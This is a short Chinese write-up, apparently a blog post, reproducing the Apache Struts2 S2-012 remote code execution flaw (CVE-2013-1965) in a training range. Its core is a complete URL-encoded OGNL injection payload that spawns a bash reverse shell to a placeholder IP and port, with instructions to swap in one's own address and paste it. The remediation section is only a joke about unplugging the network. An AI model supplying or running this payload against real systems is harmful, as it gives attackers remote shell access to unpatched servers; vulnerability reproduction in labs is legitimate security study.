[漏洞复现]Apache Struts2/S2-012 RCE（CVE-2013-1965）

一、漏洞情况分析

Apache Struts Showcase App 2.0.0 到 2.3.13（在 2.3.14.3 之前的 Struts 2 中使用）允许远程攻击者通过在调用重定向时未正确处理的精心设计的参数名称执行任意 OGNL 代码。

二、漏洞复现

春秋云境.com一键梭哈，复制粘贴直接拿下

name=%25%7B%28%23cmd%3D%27bash+-i+%3E%26+%2Fdev%2Ftcp%2Fip%2Fport+0%3E%261%27%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23a%3D%28new+java.lang.ProcessBuilder%28%23cmds%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%29%7D

把payload里的ip和port换成自己的然后Ctrl+C

三、漏洞处置建议

既然要我说两句，那我就简单的说两句吧。

1、你可以断网

2、你可以关靶场

ok说完了